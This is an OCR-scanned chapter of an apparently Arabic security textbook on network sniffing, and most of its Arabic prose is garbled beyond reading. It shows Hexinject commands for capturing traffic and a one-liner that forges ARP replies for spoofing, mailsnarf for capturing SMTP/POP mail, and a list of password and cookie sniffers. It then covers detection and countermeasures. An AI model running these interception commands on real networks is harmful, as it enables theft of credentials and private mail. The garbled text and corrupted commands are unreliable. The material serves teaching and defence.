(jiajc j ajU^JI j1^./jj jljll <jalj-<J J jjj^ ^cLoij ^^jK a£jJo3I <jal^<J ajujjuj j jSj > u ^ shl Darkstat .HTTP 
cjUj! > ^i^l ^gic J jj^a^JI (j* (j^ij ^ji obVI ^1,^ n>il . jjj-^^ ^j^- j (Bandwidth) jUaill 

,<J£jouJI (Jjl^i (jJ jjjoiaII <jjou31j Ajliil s^jLq ^Jj^jjoj ^^jII j host/ip (Jjj^I jj^y^ ^^>^ 

darkstat [ -i interface ] [ -r file ] [ —snaplen bytes ] [ — pppoe ] [ — syslog ] [ —verbose ] [ —no-daemon ] 
[ -no-promisc ] [ -no-dns ] [ -no-macs ] [ -no-lastseen ] [ -p port ] [-b bindaddr ] [ -f filter ] [ -1 
network/netmask ] [ -local-only ] [ -chrootdir ] [ -user username ] [ -daylog filename ] [ -import 
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filename ] [ --exportfilename ] [ -pidfilefilename ] [ -hosts-max count ] [ -hosts-keep count ] [ -ports- 
max count ] [ -ports-keep count ] [ -highest-port port ] [ -wait sees ] [ -hexdump ] 

Darkstat ^ ^ i- 

Jc l_ijj3I ^Lk j^Vl ^ v^ .. ri ^ iAlxl* deflate compression j^-^ s^j ^ Darkstat 

J ^ jjLft 81 ji ^Ij) ethO j 81 Jc- <L*j^ J l_jc. jj Cu£ lij Jti<J! J^f^ J^ vw * 

#darkstat -p 81 -i ethO 

.JVI ^ j^Vl a^ ^->U^ j £^ http://<serverIP or Hostname>:81 u'j^' 



darkstat 3.0.V0V 



Graphs 

Running for 28 daySj 7 hrSj 56 rn ins, 16 sees, since 2007-09-01 14:42:34 EST+IOOO. 
Total 66,302,367,236 bytes in 161,67-4,953 packets. 




last 24 hours 



last 31 days 



| reload graphs | 



#darkstat -b 127.0.0.1 (or) <yournewIP> 

i^k V upll o- 3 ^^ ^ ^ uj& ^ ."-n" ^l^i^l <> jLoj Persistent DNS -Resolution 

#darkstat -n 

."promiscuous mode" J ^£^JI <> "darkstat" ^ "--no-promisc" ^^^j 

#darkstat — no-promisc 

.f >Jl £ j^la JLk^l c^>j "-f jUiJI ^l^kl^U 

#darkstat -e "port not 22" 

#darkstat -i ethO -f "not (sre net 192.168.0 and dst net 192.168.0) M 



Packet injector: Hexinject 



J] J y** j& j*\ jVl I jlLj jajj ^51 sniffing stat j ^ (Packet Injector) uSL* j* Hexinject 

to^ljill Jc Sj^lS ajjS shell scripts lS^-^ ( . j 'Cttj^\ j - ^ j*^ ^ ( . cs-^] W-^ d-**-^ 

.Ailijuj <Ljaj A£jjud3l ^^>^ lS^-^j lP^^-^j 
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Hexinject 1.5 [hexadecimal packet injector/sniffer] 
written by: Emanuel e Ac ri <c rossbowe r@gmail . com> 

Usage : 

hexinject <mode> <options> 

Options : 

-s sniff mode 
-p inject mode 

- r raw mode (instead of the default hexadecimal mode) 
-f <f ilte r> custom pcap filter 
-i <device> network device to use 

-F <file> pcap file to use as device (sniff mode only) 
-c <count> number of packets to capture 
-t <time> sleep time in microseconds (default 100) 
-I list all available network devices 

Injection options: 

-C disable automatic packet checksum 
-S disable automatic packet size 

Interface options: 

-P disable promiscuous mode 

-M put the wireless interface in monitor mode 
(experimental: use airmon-ng instead...) 

Other options: 

-h help screen 



<li i TCP/IP^ V ^jj^j *gr^ (/ 6^ (J* s ^ ^hexinject J 1 u 1 4^ ^ ^ <^ j J* 

(j-<» <J3I 4<iila jll £>i& ja jj c _^j3I CjIj^VI .<^_pJI J jlaJlj checksum J L . ^ 1 ^ j UjUIj 



Hexinject as Sniffer 

jl hex <i^a3l ^ A£fxi3l j^. <^Lla ^ii^j <j| (_ s ) jL^JI J^U. ^ t*Ui j Sniffer ^ -ul^iuit jl j^lj Hexinject 

;JUlJI JjiLoj .raw ls* 



root@JANA :~# hexinjGct -s -i ethO 

08 00 27 6D 89 C7 52 54 00 12 35 02 08 00 45 00 05 AO 00 8F 00 00 40 06 37 DA 4A 7D E6 63 OA 00 02 OF 00 50 D3 49 00 0D FE DA B3 9D 17 D3 50 
18 FF FF 86 47 00 00 48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D OA 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 70 70 6C 69 63 61 74 6 

9 6F 6E 2F 76 6E 64 2E 67 6F 6F 67 6C 65 2E 73 61 66 65 62 72 6F 77 73 69 6E 67 2D 63 68 75 6E 6B 0D 0A 58 2D 43 6F 6E 74 65 6E 74 2D 54 79 
70 65 2D 4F 70 74 69 6F 6E 73 3A 20 6E 6F 73 6E 69 66 66 0D OA 43 6F 6E 74 65 6E 74 2D 45 6E 63 6F 64 69 6E 67 3A 20 67 7A 69 70 0D 0A 44 61 

74 65 3A 20 57 65 64 2C 20 32 33 20 4A 75 6C 20 32 30 31 34 20 31 37 3A 31 36 3A 30 37 20 47 4D 54 0D OA 53 65 72 76 65 72 3A 20 48 54 54 5 
0 20 73 65 72 76 65 72 20 28 75 6E 6B 6E 6F 77 6E 29 0D OA 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 39 30 30 32 37 0D OA 58 2D 58 53 
53 2D 50 72 6F 74 65 63 74 69 6F 6E 3A 20 31 3B 20 6D 6F 64 65 3D 62 6C 6F 63 6B 0D 0A 58 2D 46 72 61 6D 65 2D 4F 70 74 69 6F 6E 73 3A 20 53 

41 4D 45 4F 52 49 47 49 4E 0D OA 43 61 63 68 65 2D 43 6F 6E 74 72 6F 6C 3A 20 70 75 62 6C 69 63 2C 6D 61 78 2D 61 67 65 3D 31 37 32 38 30 3 
0 0D OA 41 67 65 3A 20 31 39 39 37 38 0D 0A 41 6C 74 65 72 6E 61 74 65 2D 50 72 6F 74 6F 63 6F 6C 3A 20 38 30 3A 71 75 69 63 0D OA 0D OA IF 
8B 08 00 00 00 00 00 02 FF 44 5D 77 20 95 DF IB B7 12 B7 25 B3 52 D9 17 D7 B8 FB 1A 85 52 4A 21 A2 22 C9 88 A2 28 65 45 A5 48 25 14 6D 95 59 

88 48 94 32 12 D2 A0 54 22 Dl B6 4A 2A Dl B4 D2 F8 DD CF E9 FA FE FE 3A AF F7 BE EF 79 CF 79 CE 33 3F CF 73 8E 40 63 26 DB 90 C5 61 1A 73 8 
C D9 6C 16 A5 F2 DE 9F 64 61 21 11 EA 52 39 8D 99 65 2F EB 3E A4 09 09 89 B0 5C A2 F6 OF 8E El 5F E8 B0 EB 3F 0E 87 Fl 2F 54 ID 85 7F 18 3B 
Fl 2F 74 57 5E 4E 3D 31 96 7F 41 4F E9 5A 72 AO 86 FF 26 CF 61 D5 EC CI 65 Bl DB 5E FA F0 EF 32 6E 6E CC 91 E2 F0 2F 94 3F 78 AB 31 67 88 F0 



jfeljai aLIS ^ HTTP 

#hexinject -s -i ethO -r I strings I grep f Host: f 



IA :~# hexinj ect -s 

; www.google.com 

; www.google.com.eg 

: clientsl.google.com 

; clientsl.google.com 

: www 1 . ai rc rac k - ng . o rg 

; www.aircrack-ng.org 

: www.aircrack-ng.org 

; www.aircrack-ng.org 

; www.aircrack-ng.org 



st rings | grep 1 Host : 



<uli 4a£jj^3I J£ ^Ij^luL ^ j£j "strings" ." raw dump " £^ jJI ^h^U £>i& 

Lg ^-IjVimV "grep" ^ lS^-^ 
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Hexinject as Injector 

& l£ ^ jjja a£ <li .(-p) jlrkJI <ul.ikU Ak, cillij (Injector) ^ wwi jSai Hexinject 

; Jlialt ^ .raw j hexadecimal 

#echo M 01 02 03 04 M I hexinject -p -i ethO 



'Id ©3 



13.370259000 Ethernet [Malformed Packet] - □ X 
' Frame 8 (4 bytes on wire, 4 bytes captured) TBI 



Arrival Time: Aug 25, 2G1G 21 : G6: 37. 398179GGG 
[Time delta from previous captured frame: 3.17G919QGG sec 
[Time delta from previous displayed frame: 3.17G919GGG se 



a 



HE 



QQOQ 



a 



0 



a^J j dij jjiisu ARP ARP 1 h^qj JH<JI l!^ 5 <^£' ,A£fuilt ^3^. l!^^ 4] j^-^ ^ hexinject 

#hexinject -s -i ethO -c 1 -f *arp* I replace *06 04 00 01* '06 04 00 02* I hexinject -p -i ethO 

Filter: farp *• | Expr 



JcCime Source 


DestinatiorProtocc Info 






6 3 DigitalE 


Broadcast ARP Who 


has 192.168.1.47 Tell 


192.168.1.9 


7 3 DiqitalE 


Broadcast ARP 192. 


168.1.9 is at aa:0G:G4 


GG : Ga : G4 





ujJLUuid : — repry — [diduuz j 



[Is gratuitous: False] 



Sender MAC address: DigitalE_GG: Ga : G4 [aa : GG: G4: GG: Ga : G4) 
Sender IP address: 192.168.1.9 (192.168.1.9) 



GGGG ff ff ff ff ff ff aa GG G4 GG Ga G4 G8 G6 GG Gl 

GG1G G8 GG G6 G4 ESMSE aa GG G4 GG Ga G4 cG a8 Gl G9 H 

s^LaiJl jJjVl sbtj (injecting J sniffing J ^j) hexinject (I) pipes Jl t> UJ^i^U 
s jU j oj pcap j^*-^ ^3^) ^ >^>^^ pcap o£*^ "-f" ^l^lual ^3 Jlialt 11a ^ ."replace" 

. ( http : //www . manpagez . com/man/7/pcap-f liter -Wjll 

usb Hexinject *k 

USslI cil^ a Ai oA±l\ USB ^ Ci^iil! jil Hexinject «l^t USB jj^ ^ p ca p libraries 

cjI^Ij Hexinject ^ Wi ». n ^1 ^jjU! L> ii> ^UJI USB 



rootQfcscktrack- 


-fcdse# 


hexinject - 


s -i 


nsbmoti3 




























80 3A DF 2A 


I'l 


88 FF 


TT 


43 


I«l El 


32 


03 00 2D 


I'l' 


ED 


43 


E~ 


4D 


I'l' 


3 3 


3 3 


3 3 


AA 


EE 


I'l' 


00 


00 00 00 00 


3 6 


00 00 


3 3 


3 6 


00 00 


3 3 


00 00 00 


I'l' 


I'l' 


I'l' 


I'l' 


J J 


I'E 


3 3 


3 3 


3 3 


J J 


J J 


3 3 


00 


04 02 00 00 


3 3 


00 00 


3 3 


I'l 


00 00 


3 3 


00 00 




























80 3A DF 2A 


I'l 


88 FF 


TT 


5S 


01 ei 


32 


03 00 2D 


3C 


ED 


43 


E" 


4D 


3 3 


3 3 


3 3 


3 3 


ED 


3E 


3 3 


00 


■ED FF FF FF 


I' 6 


00 00 


3 3 


I'l' 


00 00 


3 3 


00 00 00 


I'D 


I'l' 


I'l' 


I'l' 


I'D 


I'E 


3 3 


3 3 


3 3 


I'l' 


I'l' 


3 3 


00 


04 02 00 00 


3d 


00 00 


3 3 
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root@tacktrsck-:base# sudo hesinject -s -i nst>mon3 


awk -f mouse click. awk 


left click 




click released 




central click 




click released 




left+right click 




click released 





prettypacket stal 1.5 J^^\ o^j ^ ^ J A^Ula j <^ Hexinject 4.4 jl«^VI ii* 



E t he IT Tj.e t- He a de r : 

oo 04 a a oa a 4 

1C AF FV fa E OE 4E 

OS oo 

I E* Header: 
43 
OO 

OO 3E 

OO OO 

40 OO 
33 
1_ i_ 

E6 EE 

EO 43 EC DC 
CO Ol OS 

UDP Header: 

OO 33 

EZh. 9-S 

OO 3Jk 

3S Ol 



Destmatio n. ha 
Sourc^e hardware 
Type 



ittypacket 



rdware adtii 
addre s s 



Versroin y" Header length 

ToS X DF5 

X □ t al length 

XE 

Flags Fracrrr.ent offset 

III 

d t Q CO 1 

Che ck:s hull 

Source address 

Ee s 1 1 nat X a n. address 



Ee s t X nat X a n. ip- a r t 

Length 

Che cks um 



FaylQad : 

SE 5B e 1 EO OO OX OO OO OO OO OO OO 03 tt VT TV Ol 
6C O fa 67 fa F 6F SV 6C S3 03 63 6F 6E OO OO OF OO Ol 



'Berkeley mbox Jjj"^ ! Sjj^ 3 <J POP j SMTP jj^l t> tPjJ^V 1 ^ t^ssl] »W u» Mailsnarf 

#mailsnarf [-i interface I -p pcapfile] [[-v] pattern [expression]] 

.tcpdump ^ v^m^ t expression L*l .-ULuj jll f***Jo*\ j ^UaJ (regular expression) c^^UI :Pattern 

;Jli* 

#mailsnarf v " BEGIN PGP MESSAGE " l\perl ne 'print if / A From/ / A $/;' l\tee 

insecure-mail-headers 



NEMESIS 

http://nemesis.sourceforge.net 
'Nemesis . jj^j ^ j ^ySiA/^Sij^ Jio a Qi^. stal j <c.Ll^3 a^jJJI '<£.\ u<^\ ^vimi ^1 jVl jiajoa ftbi Nemesis 
Stai Ia jLiicU .(^j^-VI ^1^11 ^-c jild <c IP stacks 6 ^U^ u'j^^ 6a£jJo13 <JLuu3I i a &]aji jUlkV LsLgj a-i±A1a 

P > j TCP 'RIP <OSPF IP IGMP ICMP ETHERNET DNS ARV r >i» u^j ^W— Nemesis 

UDP 
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Additional Sniffing Tools 

4<iU*\\ JJJ* d 'lP 3 ^*^ L>^ L^J^Vl CjI jjVl c> 4 tjVl ^ LS^l ^j^aVW 

lSj"^ L^Jilk aj c ^j3I Ia j^L^a* < . ul^j sniffing ^Ij^W ^-^^ <^ ■ tCiAjLull ^ j^. JJ^iij Jalisllj 

Ace Password Sniffer available at http : //www . ef f etech . com 
RSA Netwitness Investigator available at http : //www . emc . com 
Big-Mother available at http://www.tupsoft.com 
EtherDetect Packet Sniffer available at http : //www . etherdetect . com 
EffeTech HTTP Sniffer available at http : //www . eff etech . com 
Ntop available at http : //www . ntop . org 
Smartsniff available at http : //www . nir soft . net 
EtherApe available at http : //ether ape . sourcef or ge . net 
Network Probe available at http : //www . obi ectplanet . com 
Snort available at http : //www . snort . or g 

MaaTec Network Analyzer available at http : //www . maatec . c om 

Alchemy Network Monitor available at http://www.mishelpers.com 

CommView available at http : //www . tamo s . com 

NetResident available at http://www.tamos.com 

Kismet available at http://www.kismetwireless.net 

AIM Sniffer available at http : //www . eff etech . com 

Netstumbler available at http : //www . nets tumbler . com 

IE HTTP Analyzer available at http://www.ieinspector.com 

Ministumbler available at http ://www . net stumbler . com 

PacketMon available at http : //www . analogx . com 

NADetector available at http://www.nsauditor.com 

Microsoft Network Monitor available at http://www.microsoft.com 

NetworkMiner available at http : //www . netresec . com 

PRTG Network Monitor available at http://www.paessler.com 

Network Security Toolkit available at http : //www . net worksecurit ytoolkit . or g 

Ethereal available at http : //www . ethereal . com 

KSniffer available at http://ksniffer.sourceforge.net 

IPgrab available at http://ipgrab.sourceforge.net 

WebSiteSniffer available at http://www.nirsoft.net 

ICQ Sniffer available at http : //www . etherbo s s . com 

URL Helper available at http ://www .urlhelper. com 

WebCookiesSniffer available at http://www.nirsoft.net 

York available at http : //thesz . diecru . eu 

IP Traffic Spy available at http : //www. networkdl s . com 

SniffPass available at http : //www . nir soft . net 

Cocoa Packet Analyzer available at http : llw w w . tastycocoab ytes . com 
vxSniffer available at http : //www . Cambridge vx . com 
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^SNIFFER LP <**fe ^ 

^jjajj <^-!^ .Ai^iu^l a£^juJI c>5 ic A^jj sniffing ti^lj^t ~ i^jLujj j£tg-Il q\ \ ^pia 

>c ^Jj LftS 3 > A \\\ cA£auA\ jlkV sniffing ^ ^*>»il ^ig-xJI c 




i^Ull J£.ui3l ^ qiia j& U£ ;4£jj^3I l^Iuu^I CjIj^VI 





fcgft M? k 

■ ■ ■ 

»f : 



'("Spoofed") ^ j ARP J-jV ARP Spoofing ^oii^ <uli t( _i^JI jl^J! 4i j** j :4 SjkiJt 





«■■■■> Hv| I 







;^U3I Jl^JI ^ qua j& t(MITM) < «>^"* ^ J^j ^ j^a ^^-(ijaaj 
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A ui\ uiaJl dlLa j1*_a3| £-|j^lull ^ £ dJ ^jVI .A-la - gall (JjS ^ ^LJlol^llj <ioJj>Jl CAjLuIt <j£ ^JjJ f^S ^ <J^' l6 * J^^l 





An attacker connects his laptop to a Ho runs discovery tools to learn 

switch port Wf about network topology 

le pais 
using i 

i 

The traffic destined for the victim The hacker extracts passwords and 

machine is redirected to the attacker sensitive data from the redirected traffic 




(Countermeasures) Sniffing ^ SjLi^ll j^t^Jt 8.8 



^^jII cjIj^VI 3 alia o ^1 jjlj Ai.^jjaa>JI C5 ic sniffing (j-a 3 alia a ^1 jjL ^ixl^I^JI ^Ua t aj£ li^U ^13 t(jVl (_5^ 

.sniffing el) -0 ^S^It 4_jLa^J L^nJaj (j^j <^i3l s^LiaxJI j^l^l ^j^xJI < *° - gaj ^ .Sniffing ^j*^* ^jl 1 * *^ *j 



^Sniffing ^ ^uLS 

iSniffing ^ i ; iiaj ^^ic tiicLaij q\ \ $ i£ aj c _^j1I s^Lja-<JI jjjI^jII o^xj 
.Packet Sniffer £j#3j ajjISJ ^ Ju^l (Network Media) ^SJI JajL* j yJ*ill J j^i jll ^ 

.AjJjuJl dlLi jlst-<Jl AjL^J Jjjjuall aIA^JjujI 

. ARP cjS>1I s jSli Jl (Gateway) s ^ b MAC u> - 

4<>u%\\ Jk. cjV^U aur^ti ARP ^jVU^I AiLjal ^> ^j^l^J! ^lJ aIjU ARP Jj^j (Static) IP ols^ - 
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u ^vim^ :li£l> ^ t*Ui jl£ lijj (network identification broadcasts) ^ 
.IPv4 0* IPv6 j^^^V^ ^l^klaal j Sniffing ^ lgiL£&l ji ^ ^--^ u-* ^ o-^j-^l 
^jJI j CjVI^^U SSL 'FTP c> (SCP) (>VI j Telnet t> SSH s >^ ^LJ* ^»^^» 
.ajSL^I ^ Sniffing uUa Ux^i ^iii Uj t^jjjSiyi 

. jj^J! cjUKj ^^klaiJI ajU^J HTTP c> ^ HTTPS ^^^i 



-C5 ill<JI iaia CjULiJI ^ jij ^j^lLjjoJI ^jl lLli^ hub switch 
^1 <J jll l gaS jjc. jl l l^j j£ >■* * jjc. ^iiLjaxJI j* I^jV crossover ^ j^l L - J ^ ^I^jjujI 

.s witch j hubs 

CjU^JIj CjI^VJI (Authentication Password) 
.MAC <J-^^ ^lal 4_j^Loj!>UI J jl! <Jakjj jj jjUx^l! jtg-^. Jj^I j^I JJ°'**V Lajta 
.MAC JIa2jI 2^ liA s J^i31 ^Uaj V^j NIC c> Sj^W* MAC .atajU 
.promiscuous mode ^ jl! ^ J**j NIC a£j^3I cj jj£ ^! jl£ lit U ^j^j3 j^UI antisniff ^ 

(IPSec) IP security r 
S/MIMEj PGP r 
.(OTPS) one-time passwords ^ 
.(virtual private networks) VPNs ^ 
.SSL/TLS JAwj^I r 
.(SSH)^J^ r 



Sniffing CP ^£ 

Promiscuous Mode 

.promiscuous mode <^j^ J^j jUUjSI jjja'aS^j^ JaliSlb Jaiaa ^jL ^illj Sniffer ( ' q > ' 1< ^ <J$-^ c> 

^-jja jll ^ Jaxj c> jia^It tilJ^ 'Sniffer jj^ .^W^l ^ ^ Sniffer 

uj j 6 jjj^^ (traffic) ? A ^ J ^^ a1[Li Promiscuous mode .promiscuous mode 

DNS .^W^l jjj* ^ ^ ^U^l ( jt > ^ 1 ^ Standalone sniffers u^j^ c> J^ll 

.non-standalone sniffers ^^ki^ jl l^i^j (reverse DNS Lookup) c^^^ 
.Nmap t^Uajll ^ promiscuous mode ^ J\ Cf- ^£13 A^\lA\ ch\ ^ ji&l! ^Ua 

IDS i- 

aL^I ^c, lA^II ^ ^^l^i ^1 ^Vl aJI ^ j intrusion detection system J ^ j (IDS) Jl^ll ^Uaj 

^sniffing 6 jf*^ JaL^ ^— 5 ^^/y j> ^l^^c-j-j ^j^j 4a£jJo3I C5 ic IDS cJ^^j .4^u*ll ^^ic sniffing 

'MAC spoofing 
Network Tools «t 

^jjjUslSI ^ ^3^3^ (Jaa <jj^>sl!I ^ j^JI Ajja <jal^<J HP Performance Insight *!^VI l!^ ^^j^l j^i lS^*-*^ ^-^j' ^ 

/ alia a!1 CjjjjjlSlj ^jl ^<JI <£jjuj 4_jjj^<JI CAiUJ! JJ^jj ; 4 Ala. jjj ^j-d SbVl oi^ .4 laalftll 



ING : SNIFFING ^ uLi£J! 



.promiscuous mode ^ u?^ ^j^^Ji ^Uaill aj^j j-H^j Sniffer * — aj^SIS 

Qp. ^ ^Luj Uu» 'promiscuous mode ^jll ^ lUs c5^^ c> lA^II ^ ^ Ping ^iij^ lA£ ^jj Uj^^ 

^ Sniffer 

q\ jic j <j (j-aUJI IP jl <j Jl^aJI ping request J^jj <Jj J^Sa ^H^j jl c_j jLujVI 11a ^Ijj ^ ^jSall 
'(i^UaL V MAC u'j^ ^ Ethernet adapter lP^j^ u 1 c^^ 31 c> MAC 

(jli t^UilUj _<alia^ ]VIAC lP 3 ^^ tillil t . LiaJLujj sniffer *^ 3c ' lI^*^ ^ iLuL&]i jl^_aJI 
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promiscuous <^j^ f^-^ t> ping cjLUojJ jjj Jjill jJ^I 4£^dl ^ ^ sniffer ^ ^ta^l^ 

^^ki^i axj ^& aLjL .non-promiscuous mode j^jll ^ lU^ ls^ ^Uidlj mode 



Admin 
36-2E-3G-45-S6-K2 



Promiscuous Mode 



Pine Message 

(10.0,0*1, AA;BB;CC:DD;EE;FF) 



Response Received 



3 



Suspect Machine 

10.0,0.1, 
11-22-33-44-55*6 



Non-Promiscuous Mode 



Ping Message 

(10.0.0.1, AA:8B:CC:DD:EE:FF) ^ 

> MVf 

*_i ■ No Response 

Admin Suspect Machine? 

10-0,0.4, 10.0.0.1, 
3&-2E-3G-45-56-K2 1 1-22- 33-44-55-66 




ARP 4i> : SNIFFING & ^S61\ 



l ^U ^ ^1 sjSJI jli ^ (Node) ^S*ll 5^ J] non-broadcast ARP J- J ^ u yr* ^ 'M^ 1 6 ^ yr* 
ping message A? uVl o- 3 ^ ARP u'j^ (Cache) 03 j^j 4^ ^ promiscuous mode f^jll 
MAC u 1 yr^ ^ ^ MAC u'j^ u^j 4> o-^ 1 IP uL^ (Broadcast) 

Jaxj ^1 ^ ciL ^-aUJI broadcast ping ^UIujVI ^ s jiS jj^ (<i^ ^> j^ 5 ^ yr^) ^ o- 3 ^ 

^ Sniffer yr^ cf ( <^*j y?* e^ 3 ^ ^ 6 promiscuous mode <^j^ 



Nor -Broadcast ARP 




IP ID: 

MAC: O0:lb:43:64:42:e4 



IP ID: iS2.1G8.1Sa.l 
MAC: DO-14-20-O1-23-45 



Nun GrOddtdbL f.P.P , 



IP ID: 192.16«,16&.2 
MAC. 0O 14 20 Ol 23 -4* 



Non-0 ro adca si ARP . 



IP ID: 191,168 16& J 

MAC: 0O-14-20 Ol 23 47 



Only a machine in promiscuous mode 
(machine C) caches the ARP information 
(IP and MAC address mapping) 



Nun Br i>ddLd nl ARP 




11* ID; 194.S4.67. 10 
MAC: 00:lh:4B:64:42:fe4 



IP ID: 192.1G3.16B.1 
MAC: 00-14-20-01-23-45 



Non-Broacfcasl ARP 



< 



Ping Reply 



m 7* 



N. in Pi Lh-HnJidNl ."iRP 1 



ARP Request 



IP ID: 192,163,166,2 
MAC [ 00- 14 20 OI 23*6 

IP in 19Z.166.168 3 
MAC: DO 14-20-OI 23-47 



- 



A machine in promiscuous mode replies to the ping 
message as it has correct information about the 
host sending ping request in its cache; rest of the 
machines will send ARP probe to identify the source 
of ping request 



DNS : SNIFFING cJ^aa cp 



jj^ aZj^ fcbjj DNS 



^ Sniffers ,DNS v> ji^V aLjUI ^ Reverse DNS Lookup 

<£jjaJ! ^^Ic jj jjia^II ^3^'^ .a£jjoJ! ^^ic Sniffers ^ j^-j I j^j^ uj^ clA^ a£jjoJI jjj-* ^^>^ ^ o^U^ll ,a£jjoJI 
Ua^j ^ DNS pSU .axj ^ J Ul^ Ul c^^i DNS ^'j^j o^j .promiscuous mode ^jJl ^ uj^ 

CIjULc; A^ajl l^l^klujl ^j^dj *^ ja. jjc; IP fj\ jic ICMP ^W^ 3 J^jj ^J^ 3 .^j' J^^ ^^^tJI DNS diLalx^ lj>laa3 

.sniffer * ^ > ^ >> n l^ji ^ ^-MUj tPing ^ ^ yr ja1 ^ DNS ^ -cr^^ DNS 
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J] ICMP d^j] £ .promiscuous mode ^jll ^ jI^I jl caJ^JI yr" 1 ^ DNS 



PSng (192.1611.0.1) 



IP ID; 192,158 lea, 1 
MAC: 00-13 20 01 23-45 




Reuerie DfJS Lookup 



IP ID: 192*168, 16&2 
MACi 00-14-20-01-23^6 




DNS Server 



IP ID: 192.100. lfea.3 
MACS 00-14 -20-0 1-23-47 




jL*aIL ljp^I J^Lk <> SOURCE-ROUTE iSNIFFING OASM 



4iUbU ^ jiij .loose-source route ^ j*^ ^*J* source-route j tij^l <^l i> 6 ^ 

lU*j Router ^ ^>>JI cA^j jl g-MLj ^l^oij ^U>J3 IP Header -SI J^ta source-route Mji^l jt^ll 

jj A jU^I Al« . C jU^I Routing jjj^I Disable lU*j ^ . . C jB jA Upl 

ajI^IU Router jl Jl a2L*J1 A J^j] ^ . B jU^I c^l d^ i>j C jU^I ul 4-*>JI 

^jj ^Lg^JI ^jli (ILLm AilajU LLaii) j^j - ^ V C ? ^ UJ^ ( ; *j u^ ■ C j^?^ C5-SI ^ ^ ' 0 j! ♦ f J^ 3 j1.ui.a3I ^jU ^ jjj *L<»^JI 
^ j^JI c_LLoijj ILjaixi j^JI Spl jl> ^jIj Promiscuous Mode t^j^^ B jU^^ uj^ u^j DROP 

.Sniffer J^»j B ^W^^ cr^s -U^ ^ j^W ^ H+j* 

29 30 u 1 ^ J TTL -Si lU^ eJ ii >! jl^ <> ^ ^>J1 TTL -SI ^ j c^j^Vl aIUJ! 

jj^<u]| A-ilxxj ^3 C uj ( ♦ H M1 - j 6^.1 j jj^j <ia^<i ^j-<i djj-G <^13i j 29 W TTL j B ls^^ l! > ^ > >1 
A C5 ic ^jj ^jj^ ^UlUj (Sniffing jj <L* _pJl ialiiilU ^la < v-v) 30 W^^j B jW^SI ^ L "^ 1 ^ j ^3^SI u!^ 

. . . Sniffer B jyi ^ j ^ c?H!! 30 ^ ^j^ 3 TTL -SI 

C*« ci» DECOY JU£L-L iSNIFFING ^ O^JI 

. Telnet j FTP j j '^ti^l jj jU^ jl Virtual Machine J ^ - ^ <j ^jij U J£ <Ljia3l ^ 

j] ^JUlUj Plain Text a a 1 ^^jj cJ^ 1 c^^- WS jjj^I ^aKj ^^jjoixJI ^jujI J^jj ^ WS^ cjLq^JI ^jU l-ajj^ 



<li l^Liau s n iff urk \ /Ml liA e Ua axjj .^LUjIU ^jii^ ciLi <jU a<^\ Sniffer 

t^lc til^jc Sniff lS-**^ L^^l jW^Sl ^—^1 L " ^ UJ^ C^S^^J ^J^l ^ 6 ^ ( jA < Q > lkljaui3i ^.Ldjujl <Jajuj| J J^-^l ^ ^ a 

Network ^5^* j sj^^ ^1 ^LLj^jj <J>uu ^jl ^1 _a£jjoi3I ^jujIj jIa^» ^^Ic (Jasu L^jI Aij^Ul oi^ CjI ji* 

.^f^l c> ^ >JI (Sniffer) j ^ uj^ 5 ul cr^^ Source-Route L> ^ Segment 

.Decoy ul ^ j^ 1 .Honey pot JIa^Ij ^ aLjUi ^ Jjij j^j uJa 
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Time Domain Reflect meters <ji TDR :Sniffing *US2 OF- 

^ Reflected Energy ^£xi<JI AiLkll (jjxlud^ll dis jll l_jLoi^. J!>lk AiLo^JI l-jLo^. ^jj^j ls 1c axuxj <Lj]a3l 
Electrical Pulses ^^j^ ^AjJ^j JLuj jU TDR .CjI jbl jllj jUjjuJI ^ <Lxlu^l (jjJall . 

.l$Jj£i ^^jll (jj^iall ^glc UUj liLuJ (JJ^J CjliLauJ! L-jL J J^J^J l*Jia . . . <95fL<Jl CAjujI^juYI cs - ^ * ^J^J (^5^ 

(jl^-ftj Ethernet TAP j] ^ 1 ^ ^ CjliLab<JI <jj Lajj ,4£jJo3I ^^Ic <la jjj-* ^ o^j^ 

^ j£i c _^j3I Hardware * c ^ *^ *l jf*^ £j ^ * >1 J W^-^ el) - * j (JLA^ l>* t — LA ^ ^ t Aij^Ui £>1a ^ j 
.ajUU ciuL^ J^Ai Ujja.j ^ 3JV^ ^jVit" Vj lUjj V yr^J ^f*^ Sniffing ji Packet Capturing 



Network Latency : Sniffing CjLSSj <jp 

J jj^a jll ( yialaaJ ^ IxJa .Sniff f C> j] ^ ^ J ■ ■ ■ Load J -la ^j Ja AjIc^ ^1 ^CPU C> S 

<^.l^Jj 4i^joj dbaaJ C _^A IxJa .<!LaJl oi^ Ai^atxi yialuaJ ^SA A£l±uA\ C5 Jc Flood cJ-^ j' (J^ J^*j ^ J' (J^ J^-^ ^J^J^ 

.P^jSj ^la£i ^ ^WUj l^ialSj S^i.ffl DOS lU»J 5LjS1 



oIaj ^211 cjI jj! Liajl dllfe ,4lxuJI ^ Sniffer ^£ Jj^ ^Vt t$i j^l rw^mt ^1 jjtll 6^ 

.Alfwlt ^ Sniffer 6^ < nSU Qjtt^ *\\ ^> l^a)±kluul 



Sniffing <-i^£JI cjIjjI 



Tool: arp watch 

4£jJa3l (MAC CteJ^ j IP ^—^j^j iaUij j>» ^^ic til^cLaaj ^illj jAj^aSI ^ jjLg ^Ujj Arpwatch 

W 1 ?- MAC ol^j IP ojj^ cjI^jI^ c> 2^ .Ethernet/ip cl^j^^ c^j s^Uj hqi^i j 

#arpwatch -i ethO 

< aUll cjYU^I J^k ^> t*lli ii^^j cJ^a <^3all ^ IP jl MAC u' MAC lS^» jj ^ UK <c*13i3 

./var/log/message CjVU^I J\ /var/log/syslog 



tail -: 



var/ 1 □ g/me s s age s 



Sample Output 



Apr 15 12:45:17 tecmint arpwatch: new 

Apr 15 12:45:19 tecmint arpwatch: new 

Apr 15 12:45:19 tecmint arpwatch: new 

Apr 15 12:45:19 tecmint arpwatch: new 

Apr 15 12:45:19 tecmint arpwatch: new 



station 172.16.16.64 dO : 67 : e5 : c : 9 : 67 
station 172.16.25.86 0 : dQ : b7 : 23 : 72 : 45 
station 172.16.25.86 0 : dO : b7 : 23 : 72 : 45 
station 172.16.25.86 0 : dO : 1>7 : 23 : 72 : 45 
station 172.16.25.86 0 : dO : b7 : 23 : 72 : 45 
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Tool: LOpht Antisniff 

http://gbppr.dyndns.org/10pht/antisniff/download.html : j^-a^ll 
